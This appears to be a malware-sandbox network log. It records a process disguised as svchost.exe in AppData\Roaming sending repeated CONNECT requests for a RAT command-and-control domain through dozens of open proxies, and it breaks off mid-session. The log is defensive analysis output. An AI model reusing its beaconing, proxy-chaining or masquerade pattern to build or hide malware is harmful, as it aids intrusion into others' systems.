                                                                                    3293192.168.2.55564051.15.132.2151637943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.141674995 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146047115 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3294192.168.2.560600207.244.241.1656040243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.142113924 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3295192.168.2.56053194.130.94.458043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.142206907 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3296192.168.2.55580912.186.205.1218043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.145956993 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.146138906 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3297192.168.2.560404194.31.79.752590043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.160289049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.177498102 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846472979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3298192.168.2.560612162.159.242.1048043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.163325071 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.324304104 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3299192.168.2.56055437.235.53.208678943312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.171122074 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.495233059 CET339INHTTP/1.1 403 Forbidden
                                                                                    Server: squid/4.7
                                                                                    Mime-Version: 1.0
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html;charset=utf-8
                                                                                    Content-Length: 5
                                                                                    X-Squid-Error: TCP_RESET 0
                                                                                    Vary: Accept-Language
                                                                                    Content-Language: en
                                                                                    X-Cache: MISS from proxy.wakoopa.com
                                                                                    Via: 1.1 proxy.wakoopa.com (squid/4.7)
                                                                                    Connection: keep-alive
                                                                                    Data Raw: 72 65 73 65 74
                                                                                    Data Ascii: reset


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3300192.168.2.560521120.37.121.209909143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.177138090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.530133963 CET325INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.12.1
                                                                                    Date: Sat, 09 Mar 2024 12:15:15 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 173
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.12.1</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3301192.168.2.5605391.15.62.12567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.181251049 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3302192.168.2.56048080.249.112.1628043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.182265043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.657845020 CET343INHTTP/1.1 400 Bad Request
                                                                                    Server: nginx/1.14.0 (Ubuntu)
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 182
                                                                                    Connection: close
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3303192.168.2.56013091.92.155.207312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.193072081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.508114100 CET28INHTTP/1.1 400 Bad Request


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3304192.168.2.560613142.54.232.6414543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.215558052 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3305192.168.2.559242103.74.100.190312843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.216036081 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3306192.168.2.56056161.178.152.31730243312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.216331005 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.580928087 CET90INHTTP/1.1 200 OK
                                                                                    Content-Type: application/json
                                                                                    Connection: close
                                                                                    Content-Length: 55


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3307192.168.2.555776154.236.189.7197643312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.236004114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.378102064 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3308192.168.2.56010969.160.223.129818143312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.239065886 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3309192.168.2.555700103.156.249.30808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.246474028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3310192.168.2.555902167.172.96.2138043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.252027035 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333471060 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3311192.168.2.555907167.99.131.118043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.252193928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:38.333566904 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3312192.168.2.560524223.112.53.2102543312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.326972961 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:36.373832941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:37.846421957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3313192.168.2.555723198.89.91.90567843312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.327414036 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3314192.168.2.56059243.133.136.208880043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.329145908 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3315192.168.2.560632104.20.34.1008043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.330718994 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.487495899 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3316192.168.2.56061443.155.170.351567343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.332226038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3317192.168.2.55893483.12.149.202808043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.336441040 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3318192.168.2.560782178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.352504969 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3319192.168.2.56079243.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.365653038 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3320192.168.2.560791178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.365772009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3321192.168.2.560659104.19.5.2478043312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.366722107 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive
                                                                                    Mar 9, 2024 13:14:35.521044016 CET316INHTTP/1.1 400 Bad Request
                                                                                    Server: cloudflare
                                                                                    Date: Sat, 09 Mar 2024 12:14:35 GMT
                                                                                    Content-Type: text/html
                                                                                    Content-Length: 155
                                                                                    Connection: close
                                                                                    CF-RAY: -
                                                                                    Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                    Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3322192.168.2.56079343.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.368100882 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3323192.168.2.560794178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.368432045 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3324192.168.2.56079543.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.370893002 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3325192.168.2.560796178.128.157.11444343312C:\Users\user\AppData\Roaming\svchost.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    Mar 9, 2024 13:14:35.371723890 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                    Host: artemis-rat.com
                                                                                    Proxy-Connection: Keep-Alive


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3326192.168.2.56079743.153.172.7644343312C:\Users\user\AppData\Roaming\svchost.exe
